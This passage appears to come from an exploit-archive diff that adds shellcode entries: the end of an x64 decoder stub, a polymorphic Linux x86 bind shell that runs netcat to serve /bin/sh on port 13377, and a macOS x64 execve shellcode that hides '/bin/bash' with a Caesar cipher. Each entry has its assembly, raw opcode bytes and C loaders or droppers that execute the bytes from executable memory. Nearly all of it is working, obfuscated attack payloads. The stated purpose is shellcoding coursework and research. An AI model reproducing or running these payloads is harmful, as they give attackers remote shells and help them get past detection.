odd: ; rotate left
rol bl, cl
bitFlip:
xor bl, 0x01
restore_next_byte:
mov byte [rsi + rdx], bl ; replaces the original byte
mov bl, byte [rsi + rax+1] ; mov next shellbyte
mov byte [rdi], bl
inc rdi
add al, 2
inc dl
inc cl
; Doing circular array as modulo workaround. Use 0x08 as a divisor or circular boundary because we are rotating 8 bits (al register).
cmp cl, 0x08 ; if equal ZF will be set meaning we have a complete rotation
jnz decode ; $+2 ; jump if rotation is not complete
xor rcx, rcx ; if rotation is complete and reset cl to start again the "circular array"
jmp short decode
##############################################
// Filename: shellcode.c
// Compile: gcc -z execstack -fno-stack-protector shellcode.c -o shellcode
#include<stdio.h>
#include<string.h>
unsigned char code[] = \
"\xeb\x42\x49\xff\x18\x02\x07\xff\x8a\xff\x94\xff\xd5\x02\xb8\x02\xb1\xff\x68\x02\xde\xff\x8b\x02\xc5\x02\x27\x02\x2d\xff\x49\x02\xa4\xff\x88\x02\x73\x02\x45\xff\x4a\xff\x88\x02\x7c\xff\x59\x02\xa4\xff\x88\x02\xcf\xff\x25\xff\x50\x02\x1c\xff\xd1\x02\x38\x02\x08\x02\xa0\xa0\x48\x8d\x35\xb7\xff\xff\xff\x48\x8d\x7e\x01\x48\x31\xc0\x48\xf7\xe0\xb0\x01\x48\x31\xc9\x48\x31\xdb\x8a\x1c\x06\x80\xf3\xa0\x74\x9d\x80\xf3\x5f\x8a\x1c\x16\x75\x04\xd2\xcb\xeb\x02\xd2\xc3\x80\xf3\x01\x88\x1c\x16\x8a\x5c\x06\x01\x88\x1f\x48\xff\xc7\x04\x02\xfe\xc2\xfe\xc1\x80\xf9\x08\x75\xd0\x48\x31\xc9\xeb\xcb";
main() {
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}

127
shellcodes/linux_x86/51189.txt Normal file
View file

@ -0,0 +1,127 @@
# Exploit Title: Polymorphic linux x86 nc -lvve/bin/sh -p13377 shellcode (92 Bytes)
# Exploit Author: Eduardo Silva
# Date: 2022-12-28
# Tested on: Linux x86_64 SMP Debian 4.19.260-1
# SLAE/Student ID: PA-31319
# Webpage: https://0xnibbles.github.io/
# Description: This shellcode is a polymorphic version of http://www.shell-storm.org/shellcode/files/shellcode-804.html.
# Shellcode is converted to raw opcodes and splitted in various "pieces" and those are decoded in runtime. Each "piece" of code is a preparation to nc arguments.
# To determine the end of each "piece" of opcodes that represent shellcode a nop (0x90) is used instead of a null bytes. the nop is decoded in runtime.
# The instruction - lea $Register, [esi+4] -determines which argument is being set up
# It leverages the x87 FPU instructions fnop and fnstenv to store EIP onto the stack and jump for the relative address in runtime. This used to avoid using call to perform relative jump as this introduces null bytes.
# For example, the relatiev call instruction - call $ + 0x12 ;\xe8\x0d\x00\x00\x00 - results in null bytes being added. USing fnstenv avoids this situation
#
# Example:
# $ ./shellcode
# Shellcode Length: 92
# listening on [any] 13377
#
# [...]
# $ nc 127.0.0.1 13377
# id
# uid=1000 ...
#
####################################
;Polymorphic linux x86 nc -lvve/bin/sh -p13377 shellcode
;This shellcode will listen on port 13377 using netcat and give /bin/sh to connecting attacker
global _start
section .text
_start:
xor eax,eax
mov al, 0x8
fnop
jmp short argParser ;fnstenv will make x87 FPU store this address
; the argParser stub adds 4 bytes to the stored and redirect execution to the next isntruction
sub eax,0x33317076
xor esi,DWORD [edi]
aaa
nop
lea edx, [esi+4]
mov al, 0xc
fnop
jmp short argParser
sub eax,0x6576766c ; \xe8\x0e\x00\x00\x00
das
bound ebp, [ecx+0x6e]
das
jae $+0x6a
nop
lea ecx, [esi+4]
;call $ + 0x12 ;\xe8\x0d\x00\x00\x00 --> example of how a call introduces null bytes
mov al, 0xc
fnop
jmp short argParser
das
bound ebp, [ecx+0x6e]
das
das
das
das
das
das
outsb
arpl word [eax],bx
lea ebx, [esi+4]
push eax
push edx
push ecx
push ebx
cdq
mov ecx,esp
mov al, 0xb
int 0x80
argParser: ; similar to jmp-call-pop but calls to a nop byte
; assuming al has the right distance
fnstenv [esp-0xc]
;pop esi
mov byte [esi + 0x4 + eax], ah ; null-byte decoder
lea edi, [esi + 0x4+eax+0x1]
xor eax,eax
jmp edi
##############################################
// Filename: shellcode.c
// Compile: gcc -m32 -z execstack -fno-stack-protector shellcode.c -o shellcode
#include<stdio.h>
#include<string.h>
unsigned char code[] = \
"\x31\xc0\xb0\x08\xd9\xd0\xeb\x43\x2d\x76\x70\x31\x33\x33\x37\x37\x90\x8d\x56\x04\xb0\x0c\xd9\xd0"
"\xeb\x31\x2d\x6c\x76\x76\x65\x2f\x62\x69\x6e\x2f\x73\x68\x90\x8d\x4e\x04\xb0\x0c\xd9\xd0\xeb\x1b"
"\x2f\x62\x69\x6e\x2f\x2f\x2f\x2f\x2f\x2f\x6e\x63\x18\x8d\x5e\x04\x50\x52\x51\x53\x99\x89\xe1\xb0"
"\x0b\xcd\x80\xd9\x74\x24\xf4\x88\x64\x06\x04\x8d\x7c\x30\x05\x31\xc0\xff\xe7";
main() {
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}

244
shellcodes/macos/51178.txt Normal file
View file

@ -0,0 +1,244 @@
# Shellcode Title: macOS/x64 - Execve Caesar Cipher String Null-Free Shellcode (286 Bytes)
# Shellcode Author: Bobby Cooke (boku) @0xBoku github.com/boku7
# Date: 12/20/2022
# Tested on: macOS Monterey; 21.6.0 Darwin Kernel Version; x86_64
# Shellcode Description:
# macOS 64 bit shellcode. Uses execve syscall to spawn bash. The string is ceasar cipher crypted with the increment key of 7 within the shellcode. The shellcode finds the string in memory, copies the string to the stack, deciphers the string, and then changes the string terminator to 0x00.
# Shoutout to IBM X-Force Red Adversary Simulation team! Currently working through EXP-312 and tinkering with macOS shellcoding. Shoutout to the offsec team for the cool course!
# Compile & run:
# nasm -f macho64 execve.asm -o execve
# for x in $(objdump -d execve --x86-asm-syntax=intel | grep "^ " | cut -f1 | awk -F: '{print $2}'); do echo -n "\x"$x; done; echo
# # Add shellcode to dropper.c
# gcc dropper.c -o dropper
# sh-3.2$ pstree -p $(echo $$) | grep $$
# \-+= 28533 bobby sh
# sh-3.2$ ./dropper
# [+] testcode Length: 286 Bytes
# [+] Copying testcode from variable at 0x10aeeade0 to allocated RWX memory at 0x10b030000
# [+] Executing testcode at 0x10b030000
# bobby$ pstree -p $(echo $$) | grep -B1 $$
# \-+= 28533 bobby sh
# \-+= 28584 bobby (bash)
bits 64
global _main
_main:
create_stackframe:
push rbp ; push current base pointer to the stack
mov rbp, rsp ; Set Base Stack Pointer for new Stack-Frame
sub rsp, 0x60 ; create space for string
mov [rbp-0x8], rsp ; Save destination string buffer address
jmp short lilypad_1
; char * string eggHunter(egg);
; RAX RDIa
; description: starts searching for the supplied egg starting from the callers return address
eggHunter:
mov rcx, [rsp] ; start the egghunter from the caller function return address
hunt:
inc rcx ; move to the hunter to the next byte
cmp [rcx], di ; did we find the first egg?
jne hunt ; if not, continue hunt
add cx, 0x2 ; move hunter to 2nd egg location
cmp [rcx], di ; did we find the second egg?
jne hunt ; if not, continue hunt
add cx, 0x2 ; both eggs found! Move hunter +2 to return the start of buffer addr
xchg rax, rcx ; return start of string address
ret
; int length strsize(&string, terminator);
; RAX RDI RSI
; description: gets string size of a string that is terminated with a predetermined non-null byte. Terminator byte not included.
strsize:
xor rax, rax ; clear register
xor rcx, rcx ; set the counter to zero
strsize_loop:
mov rcx, rdi ; start of string address
add rcx, rax ; current memory location of char in string
cmp [rcx], sil ; is this the null terminator?
je strsize_return
prevent_infinite_loop:
cmp ax, 0x1001 ; compare value in RAX to 0x1001 (prevent infinite mem scanning)
jg strsize_fail2find ; if value in RAX is greater, jump to label
inc rax ; move to the next char in the string
jmp strsize_loop
strsize_fail2find:
xor rax, rax ; return null/ 0x0
strsize_return:
ret
lilypad_1:
jmp short lilypad_2
; char * string terminateString(&string, terminator);
; RAX RDI RSI
; description: Finds the string terminator and changes it to a null byte
terminateString:
xor rcx, rcx ; set the counter to zero
mov rcx, rdi ; start address to look for terminator
loop_find_terminator:
cmp [rcx], sil ; is this the null terminator?
je found_terminator
inc rcx ; move to the next char in the string
jmp loop_find_terminator
found_terminator:
mov [rcx], al
ret
; void * dst_addr move_memory(void *dst_addr, void *src_addr, size_t mem_size);
; RAX RDI RSI RDX
; description: Move memory from source address to destination address
; ARG1 - RDI: destination address
; ARG2 - RSI: source address
; ARG3 - RDX: size of the memory
move_memory:
; Loop through memory and move each byte from source to destination
push rdi ; save the destination address so we can return it at the end
xor rax, rax ; register to temporarily hold the byte we are copying
move_memory_loop:
mov al, [rsi] ; read the byte from source address into the temporary register
mov [rdi], al ; write the byte at the destination address
inc rsi ; increment source address
inc rdi ; increment destination address
dec rdx ; decrement memory size
jnz move_memory_loop ; repeat loop until memory size is 0
; Return to caller
pop rax ; return the destination address of the memory to the caller
ret
lilypad_2:
jmp short lilypad_3
; void clear_memory(void *dst_addr, size_t mem_size);
; RDI RSI
; description: Writes 0x00 bytes to a destination address
; ARG1 - RDI: a pointer to the destination address
; ARG2 - RSI: the size of the memory to be written to
clear_memory:
mov rcx, rsi ; load memory size from second argument into rcx
xor rax, rax
; Loop through memory and write 0x00 to each byte in destination address
clrmem_loop:
mov byte [rdi], al ; write 0x00 to byte in destination address
inc rdi ; increment destination address
dec rcx ; decrement memory size
jnz clrmem_loop ; repeat loop until memory size is 0
ret ; Return to caller
; void basicCaesar_Decrypt(int stringLength, unsigned char * string, int chiperDecrementKey);
; RDI RSI RDX
basicCaesar_Decrypt:
bcd_loop:
sub [rsi], dl ; Subtract the value of dl from the memory location pointed to by RSI
inc rsi ; Increment RSI to point to the next character
dec rdi ; Decrement stringLength counter
test rdi,rdi ; Test if stringLength counter is zero
jnz bcd_loop ; If stringLength counter is not zero, jump back to the beginning of the loop
ret ; Return to caller
lilypad_3:
; *string = eggHunter(egg); Starts hunt from return address of caller
find_execve_string:
xor rdi, rdi ; clear register
mov di, 0xBCB0 ; Arg 1: Our egg
call eggHunter ; returns string start address
mov [rbp-0x10], rax ; Save string address
get_strlen:
mov rdi, [rbp-0x10] ; Arg 1: string start address
xor rsi, rsi ; clear register
mov sil, 0xFF ; Arg 2: string terminator
call strsize ; returns string size
mov [rbp-0x18], rax ; Save string size
; move_memory(dst_addr, src_addr, mem_size);
; RDI RSI RDX
copy_str2stack:
mov rdi, [rbp-0x8] ; Arg 1: String buffer on stack
mov rsi, [rbp-0x10] ; Arg 2: Original string location
mov rdx, [rbp-0x18] ; Arg 3: size
call move_memory
; basicCaesar_Decrypt(int stringLength, unsigned char * string, int chiperDecrementKey);
; RDI RSI RDX
do_caesar_cipher_decrypt:
mov rdi, [rbp-0x18] ; Arg 1: string size
mov rsi, [rbp-0x8] ; Arg 2: String buffer on stack
xor rdx, rdx ; clear register
add dl, 0x7 ; Arg 3: Ceaser Chiper Key: 7
call basicCaesar_Decrypt ; returns string size
do_terminate_string:
mov rdx, [rbp-0x18] ; string size
mov rdi, [rbp-0x8] ; String buffer on stack
add rdi, rdx ; Arg 1: string terminator location
xor rsi, rsi ; clear register
mov sil, 0x1 ; Arg 2: mem size to null
call clear_memory ; returns string size
; execve("/bin/bash",NULL,NULL)
execve:
mov rdi, [rbp-0x8] ; Arg 1: String buffer on stack
xor rsi, rsi ; Arg 2: NULL
xor rdx, rdx ; Arg 3: NULL
xor rax, rax ; clear register for syscall number setup
mov al, 0x2 ; set a bit in register
ror rax, 0x28 ; move the bit over 28 bits to the right in the register
mov al, 0x3b ; set the lower byte (AL) of the RAX register to the execve syscall number
syscall ; do the syscall interrupt
fixstack:
add rsp, 0x60 ; clear allocated stack space
pop rbp ; restore stack base pointer
ret ; return to caller
; ~~ Ceaser Chiper String Cryptor ~~
; Original String: /bin/bash
; String Length: 9
; Ceaser Chiper Key: 7
; Chiper String: 6ipu6ihzo
; unsigned char chiperString[] = {0x36,0x69,0x70,0x75,0x36,0x69,0x68,0x7a,0x6f};
; unsigned char chiperString[] = "\x36\x69\x70\x75\x36\x69\x68\x7a\x6f";
; Dechipered String: /bin/bash
shell_path_string: db 0xB0,0xBC,0xB0,0xBC,"6ipu6ihzo",0xFF
###########################################################################################################################################
// dropper.c
#include <stdio.h>
#include <sys/mman.h>
#include <string.h>
#include <stdlib.h>
int (*execute_testcode)();
const unsigned char testcode[] =
"\x55\x48\x89\xe5\x48\x83\xec\x60\x48\x89\x65\xf8\xeb\x3c\x48\x8b\x0c\x24\x48\xff\xc1\x66\x39\x39\x75\xf8\x66\x83\xc1\x02\x66\x39\x39\x75\xef\x66\x83\xc1\x02\x48\x91\xc3\x48\x31\xc0\x48\x31\xc9\x48\x89\xf9\x48\x01\xc1\x40\x38\x31\x74\x0e\x66\x3d\x01\x10\x7f\x05\x48\xff\xc0\xeb\xea\x48\x31\xc0\xc3\xeb\x28\x48\x31\xc9\x48\x89\xf9\x40\x38\x31\x74\x05\x48\xff\xc1\xeb\xf6\x88\x01\xc3\x57\x48\x31\xc0\x8a\x06\x88\x07\x48\xff\xc6\x48\xff\xc7\x48\xff\xca\x75\xf1\x58\xc3\xeb\x1f\x48\x89\xf1\x48\x31\xc0\x88\x07\x48\xff\xc7\x48\xff\xc9\x75\xf6\xc3\x28\x16\x48\xff\xc6\x48\xff\xcf\x48\x85\xff\x75\xf3\xc3\x48\x31\xff\x66\xbf\xb0\xbc\xe8\x6d\xff\xff\xff\x48\x89\x45\xf0\x48\x8b\x7d\xf0\x48\x31\xf6\x40\xb6\xff\xe8\x76\xff\xff\xff\x48\x89\x45\xe8\x48\x8b\x7d\xf8\x48\x8b\x75\xf0\x48\x8b\x55\xe8\xe8\x96\xff\xff\xff\x48\x8b\x7d\xe8\x48\x8b\x75\xf8\x48\x31\xd2\x80\xc2\x07\xe8\xab\xff\xff\xff\x48\x8b\x55\xe8\x48\x8b\x7d\xf8\x48\x01\xd7\x48\x31\xf6\x40\xb6\x01\xe8\x84\xff\xff\xff\x48\x8b\x7d\xf8\x48\x31\xf6\x48\x31\xd2\x48\x31\xc0\xb0\x02\x48\xc1\xc8\x28\xb0\x3b\x0f\x05\x48\x83\xc4\x60\x5d\xc3\xb0\xbc\xb0\xbc\x36\x69\x70\x75\x36\x69\x68\x7a\x6f\xff";
int main() {
size_t testcode_size = sizeof(testcode);
printf("[+] testcode Length: %lu Bytes\n", testcode_size);
void *rwx_memory = mmap(0, 0x1024, PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE, -1, 0);
if (rwx_memory == MAP_FAILED) {
printf("[!] Failed to allocate RWX memory\n");
perror("mmap");
exit(-1);
}
printf("[+] Copying testcode from variable at %p to allocated RWX memory at %p\n",testcode,rwx_memory);
memcpy(rwx_memory, testcode, sizeof(testcode));
execute_testcode = rwx_memory;
printf("[+] Executing testcode at %p\n",rwx_memory);
execute_testcode();
return 0;
}